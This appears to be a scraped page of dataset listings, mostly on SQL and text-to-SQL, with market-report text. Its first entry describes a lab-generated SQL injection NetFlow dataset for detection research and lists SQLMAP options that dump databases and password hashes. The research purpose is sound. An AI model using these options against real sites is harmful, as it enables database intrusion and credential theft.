Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.
NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset
Aim
Samples
Benign-malicious
traffic ratio
D1
Training
400,003
50%
D2
Test
57,239
50%
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.
DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).
The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.
Parameters
Description
'--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
Enumerate users, password hashes, privileges, roles, databases, tables and columns
--level=5
Increase the probability of a false positive identification
--risk=3
Increase the probability of extracting data
--random-agent
Select the User-Agent randomly
--batch
Never ask for user input, use the default behavior
--answers="follow=Y"
Predefined answers to yes
Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.
To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Overview
This dataset builds from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and SQL Query answering the question using the CREATE statement as context. This dataset was built with text-to-sql LLMs in mind, intending to prevent hallucination of column and table names often seen when trained on text-to-sql datasets. The CREATE TABLE statement can often be copy and pasted from different DBMS and provides table names, column⌠See the full description on the dataset page: https://huggingface.co/datasets/b-mc2/sql-create-context.
Facebook
Twitterhttps://choosealicense.com/licenses/other/https://choosealicense.com/licenses/other/
view code : https://colab.research.google.com/drive/1rLk-mdsWsdxwQdYYJS24rAP9KABtbiqu?usp=sharing
Example :
{"messages": [
{"role": "system", "content": "You are a SQL expert assistant. Generate clear, efficient SQL queries based on user requests. Provide only the SQL query without any additional text or explanation."}
{"role": "user", "content": "What are the top 5 most popular genres of music in the database, based on the number of tracks⌠See the full description on the dataset page: https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS.
Facebook
Twitterhttp://www.apache.org/licenses/LICENSE-2.0http://www.apache.org/licenses/LICENSE-2.0
This dataset contains 56,964 conversations between een AI assistant and a (fake) "Human" (generated) in Dutch, specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers to the Stack Overflow dataset.
Data Instances
{'id': 9, 'input': 'Het gesprek tussen de mens en de AI-assistent. ' '[|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen ' 'van kolommen. ' '[|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp ' 'bij nodig? ' '[|Human|] Ik wil de output van een UNION-query ordenen op een ' 'kolom die niet aanwezig is in de SELECT-instructie. Is dat ' 'mogelijk? ' '[|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale ' 'positie van de kolom in de ORDER BY-clausule gebruiken in plaats ' 'van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde ' 'kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken. ' '[|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ' 'ORDER BY-clausule? ' '[|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De ' 'alias moet worden gedefinieerd in de SELECT-instructie. Als je ' 'bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen ' 'met ORDER BY col3. ' '[|Human|] OkĂŠ, ik denk dat ik het begrijp. Kan ik dezelfde alias ' 'gebruiken voor kolommen uit beide tabellen in de UNION? ' '[|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen ' 'uit beide tabellen in de UNION. Elke tabel in de UNION moet een ' 'unieke alias hebben voor de kolommen. ' '[|Human|] ', 'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'},
Data Fields
id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]
input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].
topic: the topic description
Dataset Creation
Both the translations and the topics were translated with OpenAI's API for gpt-3.5-turbo. max_tokens=1024, temperature=0 as parameters.
The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):
CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.
Here are the requirements that you should adhere to:
1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other;
2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places;
3. ensure accurate translation and keep the correctness of the conversation;
4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias;
5. translate the human's text using informal, but standard, language;
6. make sure to avoid biases (such as gender bias, grammatical bias, social bias);
7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang};
8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested;
9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.
Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.
"""
The prompt to translate the topic is:
TOPIC_TRANSLATION_PROMPT = "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct,"
" summarizing manner. Translate accurately and formally. Do not provide any explanation"
" about the translation and do not include the original title.
"
The system message was:
You are a helpful assistant that translates English to Dutch to the requirements that are given to you.
Note that 82 items (0.1%) were not successfully translated. The translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. The IDs for the missing items are [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992].
The translation quality has not been verified. Use at your own risk!
Licensing Information
Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.
This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAIâs large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.
If you use this dataset, you must also follow the Sharing and Usage policies.
As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.
This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Blockchain data query: dune-sql-generate-large-series-sample
Facebook
Twitterhttps://creativecommons.org/publicdomain/zero/1.0/https://creativecommons.org/publicdomain/zero/1.0/
By Huggingface Hub [source]
A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.
For more datasets, click here.
- đ¨ Your notebook can be here! đ¨!
This dataset can be used to develop natural language interfaces for relational databases. The data fields are the same among all splits, and the file contains information on the phase, question, table, and SQL for each interface
- This dataset can be used to develop natural language interfaces for relational databases.
- This dataset can be used to develop a knowledge base of common SQL queries.
- This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries
If you use this dataset in your research, please credit the original authors.
License
License: CC0 1.0 Universal (CC0 1.0) - Public Domain Dedication No Copyright - You can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.
File: validation.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
File: train.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
File: test.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
If you use this dataset in your research, please credit the original authors. If you use this dataset in your research, please credit Huggingface Hub.
Facebook
TwitterAttribution-ShareAlike 3.0 (CC BY-SA 3.0)https://creativecommons.org/licenses/by-sa/3.0/
License information was derived automatically
sql-create-context-v2 Dataset
Overview
The sql-create-context-v2 dataset enhances the original dataset built from WikiSQL and Spider, focusing on text-to-SQL tasks with a special emphasis on reducing hallucination of column and table names. This version introduces a JSONL format for more efficient data processing and iteration, alongside a structured approach to representing SQL queries in the dataset entries.
Key Enhancements
Dataset Format: Transitioned to⌠See the full description on the dataset page: https://huggingface.co/datasets/ramachetan22/sql-create-context-v2.
Facebook
Twitterhttps://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy
According to our latest research, the global SQL Generation AI market size reached USD 1.42 billion in 2024, reflecting a robust expansion driven by the rapid adoption of artificial intelligence technologies in database management and analytics. The market is set to grow at a compelling CAGR of 27.6% from 2025 to 2033, with the total market size forecasted to reach USD 13.18 billion by 2033. This remarkable growth trajectory is primarily fueled by advancements in natural language processing, the increasing complexity of enterprise data environments, and the demand for automation in SQL query generation to enhance productivity and reduce operational costs.
The primary growth factors propelling the SQL Generation AI market revolve around the escalating need for data-driven decision-making and the democratization of data access across organizations. As enterprises generate and store vast amounts of data, the ability to quickly and accurately extract actionable insights becomes critical. SQL Generation AI solutions, leveraging advanced machine learning and natural language processing algorithms, enable non-technical users to generate complex SQL queries using simple natural language instructions. This not only reduces the dependency on specialized database administrators but also accelerates the pace of business intelligence and analytics initiatives. The proliferation of self-service analytics and the integration of AI-powered query generation into popular business intelligence platforms further amplify market growth, making it easier for organizations to unlock the value of their data assets.
Another significant driver is the ongoing digital transformation across various industries, which has led to the modernization of legacy IT infrastructures and the adoption of cloud-based data management solutions. Organizations are increasingly migrating their databases to the cloud to benefit from scalability, flexibility, and cost-efficiency. SQL Generation AI tools are being integrated with cloud data warehouses and analytics platforms, allowing for seamless query generation and real-time data analysis. This shift not only optimizes data workflows but also supports hybrid and multi-cloud strategies, enabling enterprises to manage and analyze data across diverse environments. The rising volume and diversity of data, coupled with the need for real-time insights, are compelling organizations to invest in AI-powered SQL generation to maintain a competitive edge.
Additionally, the COVID-19 pandemic has accelerated the adoption of digital technologies, including AI-driven SQL generation, as organizations seek to automate routine tasks and enhance operational resilience. The growing emphasis on remote work and distributed teams has highlighted the importance of intuitive data access and collaboration tools. SQL Generation AI solutions facilitate seamless collaboration between business users and data teams, bridging the gap between technical and non-technical stakeholders. This has led to increased demand across sectors such as BFSI, healthcare, retail, and manufacturing, where timely data insights are crucial for strategic decision-making. The market is also witnessing heightened interest from small and medium enterprises, which are leveraging AI-powered SQL generation to level the playing field with larger competitors.
Regionally, North America continues to dominate the SQL Generation AI market, accounting for the largest share in 2024, followed by Europe and Asia Pacific. The presence of major technology vendors, early adoption of AI and cloud technologies, and a strong focus on data-driven innovation contribute to North America's leadership position. Europe is witnessing rapid growth, driven by stringent data regulations and increasing investments in digital transformation initiatives. Meanwhile, Asia Pacific is emerging as a high-growth region, fueled by expanding IT infrastructure, a burgeoning startup ecosystem, and rising demand for advanced analytics solutions in countries such as China, India, and Japan. Latin America and the Middle East & Africa are also showing promising growth potential as organizations in these regions accelerate their digital journeys.
The SQL Generation AI market by component is broadly segmented into Software and Services. The software segment commands the majority market share, as organizations increasingly dep
Facebook
TwitterAttribution-NonCommercial-ShareAlike 4.0 (CC BY-NC-SA 4.0)https://creativecommons.org/licenses/by-nc-sa/4.0/
License information was derived automatically
This data contains Create database, Use, create table (int, varchar, date), describe, alter table (add, modify, char, varchar, after, rename column, to, drop column, drop), show tables, Rename table (to), Drop table.
Facebook
TwitterApache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
https://www.googleapis.com/download/storage/v1/b/kaggle-user-content/o/inbox%2F22744129%2Fdd8e395e5d70bde9279f0f653b4bc2bf%2FGemini_Generated_Image_cvz71ncvz71ncvz7.jpg?generation=1736783649344014&alt=media" alt="">
This project involves analyzing and transforming data from a bike warehouse database using SQL. The goal is to clean, transform, and query the data to generate insights about products, employees, customers, sales, and trends.
The SAP Bikes Sales database contains various tables that represent business data for a bike warehouse, such as information on products, sales, employees, business partners, and more. This project focuses on cleaning and transforming data, optimizing database schema, and generating SQL queries to gain business insights.
1.**Data Cleaning & Transformation**: - Remove duplicate records from key tables. - Drop unnecessary columns and handle null values. - Populate new columns based on existing data. - Merge related tables to create new insights. 2.**Business Insights Queries**: - Top-selling Products: Identify products with the highest sales quantities and total revenue. - Sales Performance by Product Category: Analyze revenue and order counts by product category. - Employee Sales Performance: Track employees' contribution to sales volumes and revenue. - Customer Segmentation: Examine the number of orders placed by business partners and their total sales value. - Sales Trends: Analyze sales trends over time and calculate average order values.
-**Addresses Table**:
-Checking for duplicates ADDRESSID.
-**BusinessPartners Table**:
-Handled duplicates, missing or incorrect data.
-Dropped the unnecessary FAXNUMBER column because it was empty.
-**Employee Table**:
-Dropped unnecessary columns.
-Populated NAME_INITIALS based on employee's first, middle, and last name initials.
-Fixed column type issues.
-**Product Categories and Product Texts**:
-Merged ProductCategories and ProductCategoryText tables into a new CombinedProductCategories table for easy analysis.
-**Products Table**:
-Dropped irrelevant columns such as WIDTH, DEPTH, HEIGHT, etc.
-**Sales Order Items Table**:
-Fixed null values in GROSSAMOUNT and created a TOTALGROSSAMOUNT column to track sales volume.
###2. Database Diagram and Relationships In addition to the data cleaning and analysis, a database diagram has been create...
Facebook
TwitterApache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
Image generated by DALL-E. See prompt for more details
synthetic_text_to_sql
gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:
105,851 records partitioned into 100,000 train and 5,851 test records ~23M total tokens, including ~12M SQL tokens Coverage across 100 distinct⌠See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Replication package for the paper:
Ludovic Courtès, Timothy Sample, Simon Tournier, Stefano Zacchiroli.Source Code Archiving to the Rescue of Reproducible DeploymentACM REP'24, June 18-20, 2024, Rennes, Francehttps://doi.org/10.1145/3641525.3663622
Generating the paper
The paper can be generated using the following command:
guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make
This uses GNU Guix to run make in the exact same computational environment used when preparing the paper. The computational environment is described by two files. The channels.scm file specifies the exact version of the Guix package collection to use. The manifest.scm file selects a subset of those packages to include in the environment.
It may be possible to generate the paper without Guix. To do so, you will need the following software (on top of a Unix-like environment):
GNU Make
SQLite 3
GNU AWK
Rubber
Graphviz
TeXLive
Structure
data/ contains the data examined in the paper
scripts/ contains dedicated code for the paper
logs/ contains logs generated during certain computations
Preservation of Guix
Some of the claims in the paper come from analyzing the Preservation of Guix (PoG) database as published on January 26, 2024. This database is the result of years of monitoring the extent to which the source code referenced by Guix packages is archived. This monitoring has been carried out by Timothy Sample who occasionally publishes reports on his personal website: https://ngyro.com/pog-reports/latest/. The database included in this package (data/pog.sql) was downloaded from https://ngyro.com/pog-reports/2024-01-26/pog.db and then exported to SQL format. In addition to the SQL file, the database schema is also included in this package as data/schema.sql.
The database itself is largely the result of scripts, but also of manual adjustments (where necessary or convenient). The scripts are available at https://git.ngyro.com/preservation-of-guix/, which is preserved in the Software Heritage archive as well: https://archive.softwareheritage.org/swh:1:snp:efba3456a4aff0bc25b271e128aa8340ae2bc816;origin=https://git.ngyro.com/preservation-of-guix. These scripts rely on the availability of source code in certain locations on the Internet, and therefore will not yield exactly the same result when run again.
Analysis
Here is an overview of how we use the PoG database in the paper. The exact way it is queried to produce graphs and tables for the paper is laid out in the Makefile.
The pog-types.sql query gives the counts of each source type (e.g. âgitâ or âtar-gzâ) for each commit covered by the database.
The pog-status.sql query gives the archival status of the sources by commit. For each commit, it produces a count of how many sources are stored in the Software Heritage archive, missing from it, or unknown if stored or missing. The pog-status-total.sql query does the same thing but over all sources without sorting them into individual commits.
The disarchive-ratio.sql query estimates the success rate of Disarchive disassembly.
Finally, the swhid-ratio.sql query gives the proportion of sources for which the PoG database has an SWHID.
Estimating missing sources
The Preservation of Guix database only covers sources from a sample of commits to the Guix repository. This greatly simplifies the process of collecting the sources at the risk of missing a few. We estimate how many are missed by searching Guixâs Git history for Nix-style base-32 hashes. The result of this search is compared to the hashes in the PoG database.
A naĂŻve search of Git history results in an over estimate due to Guixâs branch development model. We find hashes that were never exposed to users of âguix pullâ. To work around this, we also approximate the history of commits available to âguix pullâ. We do this by scraping push events from the guix-commits mailing list archives (data/guix-commits.mbox). Unfortunately, those archives are not quite complete. Missing history is reconstructed in the data/missing-links.txt file.
This estimate requires a copy of the Guix Git repository (not included in this package). The repository can be obtained from GNU at https://git.savannah.gnu.org/git/guix.git or from the Software Heritage archive: https://archive.softwareheritage.org/swh:1:snp:9d7b8dcf5625c17e42d51357848baa226b70e4bb;origin=https://git.savannah.gnu.org/git/guix.git. Once obtained, its location must be specified in the Makefile.
To generate the estimate, use:
guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make data/missing-sources.txt
If not using Guix, you will need additional software beyond what is used to generate the paper:
GNU Guile
GNU Bash
GNU Mailutils
GNU Parallel
Measuring link rot
In order to measure link rot, we ran Guix Scheme scripts, i.e., scripts that exploit Guix as a Scheme library. The scripts depend on the state of world at the very specific moment when they ran. Hence, it is not possible to reproduce the exact same outputs. However, their tendency over the passing of time should be very similar. For running them, you need an installation of Guix. For instance,
guix repl -q scripts/table-per-origin.scm
When running these scripts for the paper, we tracked their output and saved it inside the logs directory.
Facebook
Twitterhttps://www.verifiedmarketresearch.com/privacy-policy/https://www.verifiedmarketresearch.com/privacy-policy/
SQL In-Memory Database Market size was valued at USD 9.26 Billion in 2024 and is projected to reach USD 35.7 Billion by 2032, growing at a CAGR of 20.27% from 2026 to 2032.
SQL In-Memory Database Market Drivers
Demand for Real-Time Analytics and Processing: Businesses increasingly require real-time insights from their data to make faster and more informed decisions. SQL In-Memory databases excel at processing data much faster than traditional disk-based databases, enabling real-time analytics and operational dashboards.
Growth of Big Data and IoT Applications: The rise of Big Data and the Internet of Things (IoT) generates massive amounts of data that needs to be processed quickly. SQL In-Memory databases can handle these high-velocity data streams efficiently due to their in-memory architecture.
Improved Performance for Transaction Processing Systems (TPS): In-memory databases offer significantly faster query processing times compared to traditional databases. This translates to improved performance for transaction-intensive applications like online banking, e-commerce platforms, and stock trading systems.
Reduced Hardware Costs (in some cases): While implementing an in-memory database might require an initial investment in additional RAM, it can potentially reduce reliance on expensive high-performance storage solutions in specific scenarios.
Focus on User Experience and Application Responsiveness: In today's digital landscape, fast and responsive applications are crucial. SQL In-Memory databases contribute to a smoother user experience by enabling quicker data retrieval and transaction processing.
However, it's important to consider some factors that might influence market dynamics:
Limited Data Capacity: In-memory databases are typically limited by the amount of available RAM, making them less suitable for storing massive datasets compared to traditional disk-based solutions.
Higher Implementation Costs: Setting up and maintaining an in-memory database can be more expensive due to the additional RAM requirements compared to traditional databases.
Hybrid Solutions: Many organizations opt for hybrid database solutions that combine in-memory and disk-based storage, leveraging the strengths of both for different data sets and applications.
Facebook
Twitterhttps://spdx.org/licenses/CC0-1.0.htmlhttps://spdx.org/licenses/CC0-1.0.html
Objective: To enhance the accuracy of information retrieval from pharmacovigilance (PV) databases by employing Large Language Models (LLMs) to convert natural language queries (NLQs) into Structured Query Language (SQL) queries, leveraging a business context document. Materials and Methods: We utilized OpenAIâs GPT-4 model within a retrieval-augmented generation (RAG) framework, enriched with a business context document, to transform NLQs into executable SQL queries. Each NLQ was presented to the LLM randomly and independently to prevent memorization. The study was conducted in three phases, varying query complexity, and assessing the LLM's performance both with and without the business context document. Results: Our approach significantly improved NLQ-to-SQL accuracy, increasing from 8.3% with the database schema alone to 78.3% with the business context document. This enhancement was consistent across low, medium, and high complexity queries, indicating the critical role of contextual knowledge in query generation. Discussion: The integration of a business context document markedly improved the LLM's ability to generate accurate SQL queries (i.e. both executable and returning semantically appropriate results). Performance achieved a maximum of 85% when high complexity queries are excluded, suggesting promise for routine deployment. Conclusion: This study presents a novel approach to employing LLMs for safety data retrieval and analysis, demonstrating significant advancements in query generation accuracy. The methodology offers a framework applicable to various data-intensive domains, enhancing the accessibility of information retrieval for non-technical users. Methods Test set of NLQ's used in the paper Automating Pharmacovigilance Evidence Generation: Using Large Language Models to Produce Context-Aware SQL. Also included are the Python scripts for the LLM processing, the R code for statistical analysis of results, and a copy of the business context document and essential tables.
Facebook
TwitterAttribution-NonCommercial 4.0 (CC BY-NC 4.0)https://creativecommons.org/licenses/by-nc/4.0/
License information was derived automatically
This data contains create table, int primary key, varchar, select * from, alter table, modify, int auto_increment, add, not null, desc.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
It has never been easier to solve any database related problem using any sequel language and the following gives an opportunity for you guys to understand how I was able to figure out some of the interline relationships between databases using Panoply.io tool.
I was able to insert coronavirus dataset and create a submittable, reusable result. I hope it helps you work in Data Warehouse environment.
The following is list of SQL commands performed on dataset attached below with the final output as stored in Exports Folder QUERY 1 SELECT "Province/State" As "Region", Deaths, Recovered, Confirmed FROM "public"."coronavirus_updated" WHERE Recovered>(Deaths/2) AND Deaths>0 Description: How will we estimate where Coronavirus has infiltrated, but there is effective recovery amongst patients? We can view those places by having Recovery twice more than the Death Toll.
Query 2 SELECT country, sum(confirmed) as "Confirmed Count", sum(Recovered) as "Recovered Count", sum(Deaths) as "Death Toll" FROM "public"."coronavirus_updated" WHERE Recovered>(Deaths/2) AND Confirmed>0 GROUP BY country
Description: Coronavirus Epidemic has infiltrated multiple countries, and the only way to be safe is by knowing the countries which have confirmed Coronavirus Cases. So here is a list of those countries
Query 3 SELECT country as "Countries where Coronavirus has reached" FROM "public"."coronavirus_updated" WHERE confirmed>0 GROUP BY country Description: Coronavirus Epidemic has infiltrated multiple countries, and the only way to be safe is by knowing the countries which have confirmed Coronavirus Cases. So here is a list of those countries.
Query 4 SELECT country, sum(suspected) as "Suspected Cases under potential CoronaVirus outbreak" FROM "public"."coronavirus_updated" WHERE suspected>0 AND deaths=0 AND confirmed=0 GROUP BY country ORDER BY sum(suspected) DESC
Description: Coronavirus is spreading at alarming rate. In order to know which countries are newly getting the virus is important because in these countries if timely measures are taken, it could prevent any causalities. Here is a list of suspected cases with no virus resulted deaths.
Query 5 SELECT country, sum(suspected) as "Coronavirus uncontrolled spread count and human life loss", 100*sum(suspected)/(SELECT sum((suspected)) FROM "public"."coronavirus_updated") as "Global suspected Exposure of Coronavirus in percentage" FROM "public"."coronavirus_updated" WHERE suspected>0 AND deaths=0 GROUP BY country ORDER BY sum(suspected) DESC Description: Coronavirus is getting stronger in particular countries, but how will we measure that? We can measure it by knowing the percentage of suspected patients amongst countries which still doesnât have any Coronavirus related deaths. The following is a list.
Data Provided by: SRK, Data Scientist at H2O.ai, Chennai, India
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
From 2016 to 2018, we surveyed the worldâs largest natural history museum collections to begin mapping this globally distributed scientific infrastructure. The resulting dataset includes 73 institutions across the globe. It has:
Basic institution data for the 73 contributing institutions, including estimated total collection sizes, geographic locations (to the city) and latitude/longitude, and Research Organization Registry (ROR) identifiers where available.
Resourcing information, covering the numbers of research, collections and volunteer staff in each institution.
Indicators of the presence and size of collections within each institution broken down into a grid of 19 collection disciplines and 16 geographic regions.
Measures of the depth and breadth of individual researcher experience across the same disciplines and geographic regions.
This dataset contains the data (raw and processed) collected for the survey, and specifications for the schema used to store the data. It includes:
A diagram of the MySQL database schema.
A SQL dump of the MySQL database schema, excluding the data.
A SQL dump of the MySQL database schema with all data. This may be imported into an instance of MySQL Server to create a complete reconstruction of the database.
Raw data from each database table in CSV format.
A set of more human-readable views of the data in CSV format. These correspond to the database tables, but foreign keys are substituted for values from the linked tables to make the data easier to read and analyse.
A text file containing the definitions of the size categories used in the collection_unit table.
The global collections data may also be accessed at https://rebrand.ly/global-collections. This is a preliminary dashboard, constructed and published using Microsoft Power BI, that enables the exploration of the data through a set of visualisations and filters. The dashboard consists of three pages:
Institutional profile: Enables the selection of a specific institution and provides summary information on the institution and its location, staffing, total collection size, collection breakdown and researcher expertise.
Overall heatmap: Supports an interactive exploration of the global picture, including a heatmap of collection distribution across the discipline and geographic categories, and visualisations that demonstrate the relative breadth of collections across institutions and correlations between collection size and breadth. Various filters allow the focus to be refined to specific regions and collection sizes.
Browse: Provides some alternative methods of filtering and visualising the global dataset to look at patterns in the distribution and size of different types of collections across the global view.
Facebook
Twitter
According to our latest research, the global SQL Query Engine market size in 2024 stands at USD 3.84 billion, reflecting robust growth driven by the increasing demand for efficient data management and analytics solutions across industries. The market is projected to expand at a CAGR of 12.1% from 2025 to 2033, reaching an estimated value of USD 10.77 billion by the end of the forecast period. This remarkable growth is underpinned by the escalating volume of structured and unstructured data, the proliferation of cloud-based applications, and the widespread adoption of advanced analytics and business intelligence tools.
One of the primary growth factors driving the SQL Query Engine market is the exponential increase in data generation from digital transformation initiatives, IoT devices, and enterprise applications. Organizations are increasingly relying on SQL query engines to extract actionable insights from vast datasets, enabling informed decision-making and operational efficiency. The integration of SQL engines with big data platforms and cloud environments further amplifies their utility, as businesses seek scalable and high-performance solutions that can seamlessly handle complex queries across distributed data sources. This trend is particularly pronounced in industries such as BFSI, healthcare, and retail, where real-time data analysis is critical for competitive advantage and regulatory compliance.
Another significant driver is the rapid evolution of cloud computing and the migration of enterprise workloads to cloud platforms. Cloud-based SQL query engines offer flexibility, scalability, and cost-effectiveness, making them highly attractive to organizations looking to modernize their IT infrastructure. The ability to run SQL queries on cloud-native data warehouses and integrate with various analytics tools has democratized access to advanced data capabilities, even for small and medium enterprises. Furthermore, innovations in query optimization, parallel processing, and support for hybrid and multi-cloud deployments are fostering greater adoption of SQL query engines across diverse business environments.
